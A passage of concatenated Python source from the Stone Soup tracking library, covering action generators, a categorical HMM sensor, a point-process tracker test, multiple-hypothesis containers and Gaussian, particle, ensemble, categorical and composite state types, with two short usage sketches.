"attribute ends.")
target_value: Any = Property(doc="Target value.")
def act(self, current_time, timestamp, init_value):
"""Return the attribute modified.
Parameters
----------
current_time: datetime.datetime
Current time
timestamp: datetime.datetime
Modification of attribute ends at this time stamp
init_value: Any
Current value of the modifiable attribute
Returns
-------
Any
The new value of the attribute
"""
raise NotImplementedError()
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
return all(getattr(self, name) == getattr(other, name) for name in type(self).properties)
def __hash__(self):
return hash(tuple(getattr(self, name) for name in type(self).properties))
class ActionGenerator(Base):
"""The base class for an action generator."""
owner: object = Property(doc="Actionable object that has the attribute to be modified.")
attribute: str = Property(doc="The name of the attribute to be modified.")
start_time: datetime.datetime = Property(doc="Start time of action.")
end_time: datetime.datetime = Property(doc="End time of action.")
resolution: float = Property(default=None, doc="Resolution of action space")
@abstractmethod
def __contains__(self, item):
raise NotImplementedError()
@abstractmethod
def __iter__(self) -> Iterator[Action]:
raise NotImplementedError()
@property
def current_value(self):
return getattr(self.owner, self.attribute)
@property
def default_action(self):
"""The default action to modify the property if there is no given action."""
raise NotImplementedError()
class RealNumberActionGenerator(ActionGenerator):
"""Action generator where action is a choice of a real number."""
@property
@abstractmethod
def initial_value(self):
raise NotImplementedError
@property
@abstractmethod
def min(self):
raise NotImplementedError
@property
@abstractmethod
def max(self):
raise NotImplementedError
```
#### File: stonesoup/sensor/categorical.py
```python
from scipy.stats import multinomial
from ..base import Property
from ..models.measurement.categorical import MarkovianMeasurementModel
from ..sensor.sensor import Sensor
from ..types.array import StateVector
from ..types.detection import TrueCategoricalDetection
class HMMSensor(Sensor):
r"""Sensor model that observes a categorical state space and returns categorical measurements.
Measurements are categorical distributions over a finite set of categories
:math:`Z = \{\zeta^n|n\in \mathbf{N}, n\le N\}` (for some finite :math:`N`).
"""
measurement_model: MarkovianMeasurementModel = Property(
doc="Measurement model to generate detection vectors from"
)
@property
def ndim_state(self):
return self.measurement_model.ndim_state
@property
def ndim_meas(self):
return self.measurement_model.ndim_meas
def measure(self, ground_truths, noise: bool = True, **kwargs):
r"""Generate a categorical measurement for a given set of true categorical state.
Parameters
----------
ground_truths: Set[:class:`~.CategoricalGroundTruthState`]
A set of :class:`~.CategoricalGroundTruthState`.
        noise: bool
            Indicates whether the resultant measurement vectors are sampled from, with the
            sampled (discrete) measurement categories returned instead of distributions over
            the measurement space. Sampled categories are represented by N-tuples with all
            components equal to 0, except at the index corresponding to the relevant category.
For example :math:`e^k` indicates that the measurement category is :math:`\zeta^k`.
If `False`, the resultant distribution is returned.
Returns
-------
Set[:class:`~.TrueCategoricalDetection`]
A set of measurements generated from the given states. The timestamps of the
measurements are set equal to that of the corresponding states that they were
calculated from. Each measurement stores the ground truth path that it was produced
from.
"""
detections = set()
for truth in ground_truths:
timestamp = truth.timestamp
detection_vector = self.measurement_model.function(truth, noise=noise, **kwargs)
if noise:
# Sample from resultant distribution
rv = multinomial(n=1, p=detection_vector.flatten())
detection_vector = StateVector(rv.rvs(size=1, random_state=None))
detection = TrueCategoricalDetection(
state_vector=detection_vector,
timestamp=timestamp,
categories=self.measurement_model.measurement_categories,
measurement_model=self.measurement_model,
groundtruth_path=truth
)
detections.add(detection)
return detections
```
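A minimal usage sketch (the emission matrix is taken from the measurement-model test earlier; the `CategoricalGroundTruthState` import location is an assumption):
```python
import datetime
import numpy as np
from stonesoup.models.measurement.categorical import MarkovianMeasurementModel
from stonesoup.sensor.categorical import HMMSensor
from stonesoup.types.groundtruth import CategoricalGroundTruthState  # assumed location

E = np.array([[30, 25, 5],
              [20, 25, 10],
              [10, 25, 80],
              [40, 25, 5]])
sensor = HMMSensor(measurement_model=MarkovianMeasurementModel(E))
truth = CategoricalGroundTruthState([80, 10, 10], timestamp=datetime.datetime.now())
detections = sensor.measure({truth})  # set of TrueCategoricalDetection
```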
#### File: tracker/tests/test_pointprocess.py
```python
import datetime
import numpy as np
from ..pointprocess import PointProcessMultiTargetTracker
from ...types.state import TaggedWeightedGaussianState
from ...mixturereducer.gaussianmixture import GaussianMixtureReducer
from ...updater.pointprocess import PHDUpdater
from ...hypothesiser.gaussianmixture import GaussianMixtureHypothesiser
from ...hypothesiser.distance import DistanceHypothesiser
from ... import measures
from ...models.measurement.linear import LinearGaussian
from ...updater.kalman import KalmanUpdater
def test_point_process_multi_target_tracker_cycle(detector, predictor):
previous_time = datetime.datetime(2018, 1, 1, 13, 59)
timestamp = datetime.datetime.now()
birth_mean = np.array([[40]])
birth_covar = np.array([[1000]])
birth_component = TaggedWeightedGaussianState(
birth_mean,
birth_covar,
weight=0.3,
tag=TaggedWeightedGaussianState.BIRTH,
timestamp=timestamp)
# Initialise a Kalman Updater
measurement_model = LinearGaussian(ndim_state=1, mapping=[0],
noise_covar=np.array([[0.04]]))
updater = KalmanUpdater(measurement_model=measurement_model)
# Initialise a Gaussian Mixture hypothesiser
measure = measures.Mahalanobis()
base_hypothesiser = DistanceHypothesiser(
predictor, updater, measure=measure, missed_distance=16)
hypothesiser = GaussianMixtureHypothesiser(hypothesiser=base_hypothesiser,
order_by_detection=True)
# Initialise a Gaussian Mixture reducer
merge_threshold = 4
prune_threshold = 1e-5
reducer = GaussianMixtureReducer(prune_threshold=prune_threshold,
merge_threshold=merge_threshold)
# Initialise a Point Process updater
phd_updater = PHDUpdater(updater=updater, prob_detection=0.8)
tracker = PointProcessMultiTargetTracker(
detector=detector,
updater=phd_updater,
hypothesiser=hypothesiser,
reducer=reducer,
birth_component=birth_component
)
for time, tracks in tracker:
assert time == previous_time + datetime.timedelta(minutes=1)
assert tracker.estimated_number_of_targets > 0
assert tracker.estimated_number_of_targets < 4
previous_time = time
# Shouldn't have more than three active tracks
assert (len(tracks) >= 1) & (len(tracks) <= 3)
# All tracks should have unique IDs
assert len(tracker.gaussian_mixture.component_tags) == len(tracker.gaussian_mixture)
```
#### File: stonesoup/types/multihypothesis.py
```python
from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
class MultipleHypothesis(Type, Sized, Iterable, Container):
"""Multiple Hypothesis base type
A Multiple Hypothesis is a container to store a collection of hypotheses.
"""
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
# check if 'single_hypotheses' contains any SingleHypotheses with
# Detection matching 'index'
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses with
# Prediction matching 'index'
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
        # check if 'single_hypotheses' contains any SingleHypotheses
        # matching 'index'
        if isinstance(index, SingleHypothesis):
            return index in self.single_hypotheses
        return False
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
# retrieve SingleHypothesis by array index
if isinstance(index, int):
return self.single_hypotheses[index]
# retrieve SingleHypothesis by measurement
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
# retrieve SingleHypothesis by prediction
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
"""Multiple composite hypothesis type
A Multiple Composite Hypothesis is a container to store a collection of composite hypotheses.
Interfaces the same as MultipleHypothesis, but permits different input, hence methods are
redefined.
"""
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
# cannot check instance index is detection or prediction as composite hypotheses create
# their own composite detections and predictions
# check if 'single_hypotheses' contains any CompositeHypotheses matching 'index'
# use `is` as standard list __contains__ checks for equality which may not work in cases
# where hypotheses do not all share same attributes
        if isinstance(index, CompositeHypothesis):
            return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
        return False
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
        # verify that the CompositeHypotheses composing this
        # MultipleCompositeHypothesis all have probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
# this will NOT affect the probabilities of each composite hypothesis' sub-hypotheses
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
```
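A minimal usage sketch of `MultipleHypothesis` normalisation. It assumes the `SingleProbabilityHypothesis(prediction=..., measurement=..., probability=...)` keyword signature used by the `conftest.py` fixtures later in this section; import paths mirror the file layout shown above.
```python
# Sketch: probability normalisation and measurement lookup (assumed imports).
from stonesoup.types.detection import Detection
from stonesoup.types.hypothesis import SingleProbabilityHypothesis
from stonesoup.types.multihypothesis import MultipleHypothesis
from stonesoup.types.prediction import StatePrediction
hypotheses = [
    SingleProbabilityHypothesis(prediction=StatePrediction([0]),
                                measurement=Detection([1]), probability=0.2),
    SingleProbabilityHypothesis(prediction=StatePrediction([0]),
                                measurement=Detection([2]), probability=0.6),
]
multi = MultipleHypothesis(hypotheses, normalise=True)
# Probabilities are rescaled to sum to total_weight (default 1): 0.25 and 0.75
assert abs(float(sum(h.probability for h in multi)) - 1.0) < 1e-9
# __getitem__ retrieves a hypothesis by its measurement (identity match)
assert multi[hypotheses[0].measurement] is hypotheses[0]
```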
#### File: stonesoup/types/state.py
```python
import datetime
import uuid
from collections import abc
from typing import MutableSequence, Any, Optional, Sequence
import typing
import numpy as np
from ..base import Property
from .array import StateVector, CovarianceMatrix, PrecisionMatrix, StateVectors
from .base import Type
from .particle import Particle
from .numeric import Probability
class State(Type):
"""State type.
Most simple state type, which only has time and a state vector."""
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
state_vector: StateVector = Property(doc='State vector.')
def __init__(self, state_vector, *args, **kwargs):
# Don't cast away subtype of state_vector if not necessary
if state_vector is not None \
and not isinstance(state_vector, (StateVector, StateVectors)):
state_vector = StateVector(state_vector)
super().__init__(state_vector, *args, **kwargs)
@property
def ndim(self):
"""The number of dimensions represented by the state."""
return self.state_vector.shape[0]
@staticmethod
def from_state(state: 'State', *args: Any, target_type: Optional[typing.Type] = None,
**kwargs: Any) -> 'State':
"""Class utility function to create a new state (or compatible type) from an existing
state. The type and properties of this new state are defined by `state` except for any
explicitly overwritten via `args` and `kwargs`.
It acts similarly in feel to a copy constructor, with the optional over-writing of
properties.
Parameters
----------
state: State
:class:`~.State` to use existing properties from, and identify new state-type from.
\\*args: Sequence
Arguments to pass to newly created state, replacing those with same name in `state`.
        target_type: Type, optional
            Optional argument specifying the type of object to be created. This need not
            necessarily be a :class:`~.State` subclass. Any arguments that match between the input
            `state` and the target type will be copied from the old to the new object (except those
            explicitly specified in `args` and `kwargs`).
\\*\\*kwargs: Mapping
New property names and associate value for use in newly created state, replacing those
on the `state` parameter.
"""
# Handle being initialised with state sequence
if isinstance(state, StateMutableSequence):
state = state.state
if target_type is None:
target_type = type(state)
args_property_names = {
name for n, name in enumerate(target_type.properties) if n < len(args)}
new_kwargs = {
name: getattr(state, name)
for name in type(state).properties.keys() & target_type.properties.keys()
if name not in args_property_names}
new_kwargs.update(kwargs)
return target_type(*args, **new_kwargs)
class CreatableFromState:
class_mapping = {}
def __init_subclass__(cls, **kwargs):
bases = cls.__bases__
if CreatableFromState in bases:
# Direct subclasses should not be added to the class mapping, only subclasses of
# subclasses
return
if len(bases) != 2:
raise TypeError('A CreatableFromState subclass must have exactly two superclasses')
base_class, state_type = cls.__bases__
if not issubclass(base_class, CreatableFromState):
raise TypeError('The first superclass of a CreatableFromState subclass must be a '
'CreatableFromState (or a subclass)')
if not issubclass(state_type, State):
# Non-state subclasses do not need adding to the class mapping, as they should not
# be created from States
return
if base_class not in CreatableFromState.class_mapping:
CreatableFromState.class_mapping[base_class] = {}
CreatableFromState.class_mapping[base_class][state_type] = cls
super().__init_subclass__(**kwargs)
@classmethod
def from_state(
cls,
state: State,
*args: Any,
target_type: Optional[type] = None,
**kwargs: Any) -> 'State':
"""
Return new object instance of suitable type from an existing `state`.
The type returned can be explicitly specified using the `target_type` argument, otherwise
it is chosen by introspection of the created subclasses of this type: see below for an
example. Any compatible properties are copied from the input `state` to the returned
object, except for those specified by `args` and `kwargs`, which take precedence over those
from the input `state`.
This method is primarily concerned with type selection, with actual copying performed by
the static :meth:`~.State.from_state` method. As an example of the type selection
algorithm, consider the case of the class
`GaussianStatePrediction(Prediction, GaussianState)`. This is subclass of `Prediction`,
and `GaussianState` and so the `class_mapping` property will have an entry added (when
`GaussianStatePrediction` is defined) such that
`class_mapping[Prediction][GaussianState] = GaussianStatePrediction`. If this method is
then called like below
        >>> gaussian_state = GaussianState(some_arguments)
        >>> new_prediction = Prediction.from_state(gaussian_state, *args, **kwargs)
then the `from_state` method will look up the class mapping and see that
`Prediction.from_state()` called with a `GaussianState` input should return a
`GaussianStatePrediction` object, and therefore the type of `new_prediction` will be
`GaussianStatePrediction`
The functionality is currently used by :class:`~.Prediction` and :class:`~.Updater`
objects.
Parameters
----------
state: State
:class:`~.State` to use existing properties from, and identify prediction type from
\\*args: Sequence
Arguments to pass to newly created prediction, replacing those with same name on
``state`` parameter.
target_type: Type, optional
Type to use for prediction, overriding one from :attr:`class_mapping`.
\\*\\*kwargs: Mapping
New property names and associate value for use in newly created prediction, replacing
those on the ``state`` parameter.
"""
# Handle being initialised with state sequence
if isinstance(state, StateMutableSequence):
state = state.state
try:
state_type = next(type_ for type_ in type(state).mro()
if type_ in CreatableFromState.class_mapping[cls])
except StopIteration:
raise TypeError(f'{cls.__name__} type not defined for {type(state).__name__}')
if target_type is None:
target_type = CreatableFromState.class_mapping[cls][state_type]
return State.from_state(state, *args, **kwargs, target_type=target_type)
class StateMutableSequence(Type, abc.MutableSequence):
"""A mutable sequence for :class:`~.State` instances
This sequence acts like a regular list object for States, as well as
proxying state attributes to the last state in the sequence. This sequence
can also be indexed/sliced by :class:`datetime.datetime` instances.
Example
-------
>>> t0 = datetime.datetime(2018, 1, 1, 14, 00)
>>> t1 = t0 + datetime.timedelta(minutes=1)
>>> state0 = State([[0]], t0)
>>> sequence = StateMutableSequence([state0])
>>> print(sequence.state_vector, sequence.timestamp)
[[0]] 2018-01-01 14:00:00
>>> sequence.append(State([[1]], t1))
>>> for state in sequence[t1:]:
... print(state.state_vector, state.timestamp)
[[1]] 2018-01-01 14:01:00
"""
states: MutableSequence[State] = Property(
default=None,
doc="The initial list of states. Default `None` which initialises with empty list.")
def __init__(self, states=None, *args, **kwargs):
if states is None:
states = []
elif not isinstance(states, abc.Sequence):
# Ensure states is a list
states = [states]
super().__init__(states, *args, **kwargs)
def __len__(self):
return self.states.__len__()
def __setitem__(self, index, value):
return self.states.__setitem__(index, value)
def __delitem__(self, index):
return self.states.__delitem__(index)
def __getitem__(self, index):
if isinstance(index, slice) and (
isinstance(index.start, datetime.datetime)
or isinstance(index.stop, datetime.datetime)):
items = []
for state in self.states:
try:
if index.start and state.timestamp < index.start:
continue
if index.stop and state.timestamp >= index.stop:
continue
except TypeError as exc:
                    raise TypeError(
                        'both indices must be `datetime.datetime` objects for '
                        'time slice') from exc
items.append(state)
return StateMutableSequence(items[::index.step])
elif isinstance(index, datetime.datetime):
for state in reversed(self.states):
if state.timestamp == index:
return state
else:
raise IndexError('timestamp not found in states')
elif isinstance(index, slice):
return StateMutableSequence(self.states.__getitem__(index))
else:
return self.states.__getitem__(index)
def __getattribute__(self, name):
# This method is called if we try to access an attribute of self. First we try to get the
# attribute directly, but if that fails, we want to try getting the same attribute from
# self.state instead. If that, in turn, fails we want to return the error message that
# would have originally been raised, rather than an error message that the State has no
# such attribute.
#
        # An alternative mechanism using __getattr__ seems simpler (as it skips the first few lines
        # of code), but __getattr__ has no mechanism to capture the originally raised error.
try:
# This tries first to get the attribute from self.
return Type.__getattribute__(self, name)
except AttributeError as original_error:
if name.startswith("_"):
# Don't proxy special/private attributes to `state`, just raise the original error
raise original_error
else:
# For non _ attributes, try to get the attribute from self.state instead of self.
try:
my_state = Type.__getattribute__(self, 'state')
return getattr(my_state, name)
except AttributeError:
# If we get the error about 'State' not having the attribute, then we want to
# raise the original error instead
raise original_error
def insert(self, index, value):
return self.states.insert(index, value)
@property
def state(self):
return self.states[-1]
def last_timestamp_generator(self):
"""Generator yielding the last state for each timestamp
This provides a method of iterating over a sequence of states,
such that when multiple states for the same timestamp exist,
only the last state is yielded. This is particularly useful in
cases where you may have multiple :class:`~.Update` states for
a single timestamp e.g. multi-sensor tracking example.
Yields
------
State
A state for each timestamp present in the sequence.
"""
state_iter = iter(self)
current_state = next(state_iter)
for next_state in state_iter:
if next_state.timestamp > current_state.timestamp:
yield current_state
current_state = next_state
yield current_state
class GaussianState(State):
"""Gaussian State type
This is a simple Gaussian state object, which, as the name suggests,
is described by a Gaussian state distribution.
"""
covar: CovarianceMatrix = Property(doc='Covariance matrix of state.')
def __init__(self, state_vector, covar, *args, **kwargs):
# Don't cast away subtype of covar if not necessary
if not isinstance(covar, CovarianceMatrix):
covar = CovarianceMatrix(covar)
super().__init__(state_vector, covar, *args, **kwargs)
if self.state_vector.shape[0] != self.covar.shape[0]:
raise ValueError(
"state vector and covariance should have same dimensions")
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
class SqrtGaussianState(State):
"""A Gaussian State type where the covariance matrix is stored in a form :math:`W` such that
:math:`P = WW^T`
For :math:`P` in general, :math:`W` is not unique and the user may choose the form to their
taste. No checks are undertaken to ensure that a sensible square root form has been chosen.
"""
sqrt_covar: CovarianceMatrix = Property(doc="A square root form of the Gaussian covariance "
"matrix.")
def __init__(self, state_vector, sqrt_covar, *args, **kwargs):
sqrt_covar = CovarianceMatrix(sqrt_covar)
super().__init__(state_vector, sqrt_covar, *args, **kwargs)
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
@property
def covar(self):
"""The full covariance matrix.
Returns
-------
: :class:`~.CovarianceMatrix`
The covariance matrix calculated via :math:`W W^T`, where :math:`W` is a
:class:`~.SqrtCovarianceMatrix`
"""
return self.sqrt_covar @ self.sqrt_covar.T
GaussianState.register(SqrtGaussianState) # noqa: E305
class InformationState(State):
r"""Information State Type
The information state class carries the :attr:`state_vector`,
:math:`\mathbf{y}_k = Y_k \mathbf{x}_k` and the precision or information matrix
:math:`Y_k = P_k^{-1}`, where :math:`\mathbf{x}_k` and :math:`P_k` are the mean and
covariance, respectively, of a Gaussian state.
"""
precision: PrecisionMatrix = Property(doc='precision matrix of state.')
class WeightedGaussianState(GaussianState):
"""Weighted Gaussian State Type
Gaussian State object with an associated weight. Used as components
for a GaussianMixtureState.
"""
weight: Probability = Property(default=0, doc="Weight of the Gaussian State.")
@property
def gaussian_state(self):
"""The Gaussian state."""
return GaussianState(self.state_vector,
self.covar,
timestamp=self.timestamp)
@classmethod
def from_gaussian_state(cls, gaussian_state, *args, copy=True, **kwargs):
r"""
Returns a WeightedGaussianState instance based on the gaussian_state.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
            The gaussian_state used to create the new WeightedGaussianState.
\*args : See main :class:`~.WeightedGaussianState`
args are passed to :class:`~.WeightedGaussianState` __init__()
copy : Boolean, optional
If True, the WeightedGaussianState is created with copies of the elements
of gaussian_state. The default is True.
\*\*kwargs : See main :class:`~.WeightedGaussianState`
kwargs are passed to :class:`~.WeightedGaussianState` __init__()
Returns
-------
:class:`~.WeightedGaussianState`
Instance of WeightedGaussianState.
"""
state_vector = gaussian_state.state_vector
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
if copy:
state_vector = state_vector.copy()
covar = covar.copy()
return cls(
state_vector=state_vector,
covar=covar,
timestamp=timestamp,
*args, **kwargs
)
class TaggedWeightedGaussianState(WeightedGaussianState):
"""Tagged Weighted Gaussian State Type
Gaussian State object with an associated weight and tag. Used as components
for a GaussianMixtureState.
"""
tag: str = Property(default=None, doc="Unique tag of the Gaussian State.")
BIRTH = 'birth'
'''Tag value used to signify birth component'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.tag is None:
self.tag = str(uuid.uuid4())
class ParticleState(State):
"""Particle State type
This is a particle state object which describes the state as a
distribution of particles"""
state_vector: StateVectors = Property(doc='State vectors.')
weight: MutableSequence[Probability] = Property(default=None, doc='Weights of particles')
parent: 'ParticleState' = Property(default=None, doc='Parent particles')
particle_list: MutableSequence[Particle] = Property(default=None,
doc='List of Particle objects')
fixed_covar: CovarianceMatrix = Property(default=None,
                                             doc='Fixed covariance value. Default `None`, where '
                                                 'weighted sample covariance is then used.')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if (self.particle_list is not None) and \
(self.state_vector is not None or self.weight is not None):
raise ValueError("Use either a list of Particle objects or StateVectors and weights,"
" but not both.")
if self.particle_list and isinstance(self.particle_list, list):
self.state_vector = \
StateVectors([particle.state_vector for particle in self.particle_list])
self.weight = \
np.array([Probability(particle.weight) for particle in self.particle_list])
parent_list = [particle.parent for particle in self.particle_list]
if parent_list.count(None) == 0:
self.parent = ParticleState(None, particle_list=parent_list)
elif 0 < parent_list.count(None) < len(parent_list):
raise ValueError("Either all particles should have"
" parents or none of them should.")
if self.parent:
self.parent.parent = None # Removed to avoid using significant memory
if self.state_vector is not None and not isinstance(self.state_vector, StateVectors):
self.state_vector = StateVectors(self.state_vector)
if self.weight is not None and not isinstance(self.weight, np.ndarray):
self.weight = np.array(self.weight)
def __getitem__(self, item):
if self.parent:
p = self.parent[item]
else:
p = None
particle = Particle(state_vector=self.state_vector[:, item],
weight=self.weight[item],
parent=p)
return particle
@property
def particles(self):
return [particle for particle in self]
def __len__(self):
return self.state_vector.shape[1]
@property
def ndim(self):
return self.state_vector.shape[0]
@property
def mean(self):
"""The state mean, equivalent to state vector"""
result = np.average(self.state_vector,
axis=1,
weights=self.weight)
        # Convert type, as the result may have taken the dtype of the weights
return result
@property
def covar(self):
if self.fixed_covar is not None:
return self.fixed_covar
        cov = np.cov(self.state_vector, ddof=0, aweights=np.array(self.weight))
        # Fix one dimensional covariances being returned with zero dimension
        return np.atleast_2d(cov)
State.register(ParticleState) # noqa: E305
class EnsembleState(Type):
r"""Ensemble State type
This is an Ensemble state object which describes the system state as a
ensemble of state vectors for use in Ensemble based filters.
This approach is functionally identical to the Particle state type except
it doesn't use any weighting for any of the "particles" or ensemble members.
All "particles" or state vectors in the ensemble are equally weighted.
.. math::
\mathbf{X} = [x_1, x_2, ..., x_M]
"""
state_vector: StateVectors = Property(doc="An ensemble of state vectors which represent the "
"state")
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
@classmethod
    def from_gaussian_state(cls, gaussian_state, num_vectors):
"""
Returns an EnsembleState instance, from a given
GaussianState object.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The GaussianState used to create the new EnsembleState.
num_vectors : int
The number of desired column vectors present in the ensemble.
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
mean = gaussian_state.state_vector.reshape((gaussian_state.ndim,))
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
        return EnsembleState(state_vector=cls.generate_ensemble(mean, covar, num_vectors),
                             timestamp=timestamp)
@classmethod
    def generate_ensemble(cls, mean, covar, num_vectors):
"""
Returns a StateVectors wrapped ensemble of state vectors, from a given
mean and covariance matrix.
Parameters
----------
mean : :class:`~.numpy.ndarray`
The mean value of the distribution being sampled to generate
ensemble.
covar : :class:`~.numpy.ndarray`
The covariance matrix of the distribution being sampled to
generate ensemble.
num_vectors : int
The number of desired column vectors present in the ensemble,
or the number of "samples".
Returns
-------
        :class:`~.StateVectors`
            Ensemble of state vectors wrapped in a :class:`~.StateVectors` object.
"""
# This check is necessary, because the StateVector wrapper does
# funny things with dimension.
rng = np.random.default_rng()
if mean.ndim != 1:
mean = mean.reshape(len(mean))
try:
ensemble = StateVectors(
[StateVector((rng.multivariate_normal(mean, covar)))
for n in range(num_vectors)])
# If covar is univariate, then use the univariate noise generation function.
except ValueError:
ensemble = StateVectors(
[StateVector((rng.normal(mean, covar))) for n in range(num_vectors)])
return ensemble
@property
def ndim(self):
"""Number of dimensions in state vectors"""
return np.shape(self.state_vector)[0]
@property
def num_vectors(self):
"""Number of columns in state ensemble"""
return np.shape(self.state_vector)[1]
@property
def mean(self):
"""The state mean, numerically equivalent to state vector"""
return np.average(self.state_vector, axis=1)
@property
def covar(self):
"""Sample covariance matrix for ensemble"""
return np.cov(self.state_vector)
@property
def sqrt_covar(self):
"""sqrt of sample covariance matrix for ensemble, useful for
some EnKF algorithms"""
return ((self.state_vector-np.tile(self.mean, self.num_vectors))
/ np.sqrt(self.num_vectors - 1))
State.register(EnsembleState) # noqa: E305
class CategoricalState(State):
r"""CategoricalState type.
State object representing an object in a categorical state space. A state vector
:math:`\mathbf{\alpha}_t^i = P(\phi_t^i)` defines a categorical distribution over a finite set
of discrete categories :math:`\Phi = \{\phi^m|m\in \mathbf{N}, m\le M\}` for some finite
:math:`M`."""
    categories: Sequence[str] = Property(doc="Category names. Defaults to a list of integers.",
                                         default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.state_vector = self.state_vector / np.sum(self.state_vector) # normalise state vector
if self.categories is None:
self.categories = list(map(str, range(self.ndim)))
if len(self.categories) != self.ndim:
raise ValueError(
f"ndim of {self.ndim} does not match number of categories {len(self.categories)}"
)
def __str__(self):
strings = [f"P({category}) = {p}"
for category, p in zip(self.categories, self.state_vector)]
string = ',\n'.join(strings)
return string
@property
def category(self):
"""Return the name of the most likely category."""
return self.categories[np.argmax(self.state_vector)]
class CompositeState(Type):
"""Composite state type.
A composition of ordered sub-states (:class:`State`) existing at the same timestamp,
representing an object with a state for (potentially) multiple, distinct state spaces.
"""
sub_states: Sequence[State] = Property(
doc="Sequence of sub-states comprising the composite state. All sub-states must have "
"matching timestamp. Must not be empty.")
default_timestamp: datetime.datetime = Property(
default=None,
doc="Default timestamp if no sub-states exist to attain timestamp from. Defaults to "
"`None`, whereby sub-states will be required to have timestamps.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if len(self.sub_states) == 0:
raise ValueError("Cannot create an empty composite state")
self._check_timestamp() # validate timestamps of sub-states
@property
def timestamp(self):
return self.default_timestamp
def _check_timestamp(self):
"""Check all timestamps are equal. Replace empty sub-state timestamps with validated
timestamp."""
self._timestamp = None
sub_timestamps = {sub_state.timestamp
for sub_state in self.sub_states
if sub_state.timestamp}
if len(sub_timestamps) > 1:
raise ValueError("All sub-states must share the same timestamp if defined")
if (sub_timestamps and self.default_timestamp
and not sub_timestamps == {self.default_timestamp}):
raise ValueError("Sub-state timestamps and default timestamp must be the same if "
"defined")
if sub_timestamps:
self.default_timestamp = sub_timestamps.pop()
for sub_state in self.sub_states:
sub_state.timestamp = self.default_timestamp
@property
def state_vectors(self):
return [state.state_vector for state in self.sub_states]
@property
def state_vector(self):
"""A combination of the component states' state vectors."""
return StateVector(np.concatenate(self.state_vectors))
def __contains__(self, item):
return self.sub_states.__contains__(item)
def __getitem__(self, index):
if isinstance(index, slice):
return self.__class__(self.sub_states.__getitem__(index))
return self.sub_states.__getitem__(index)
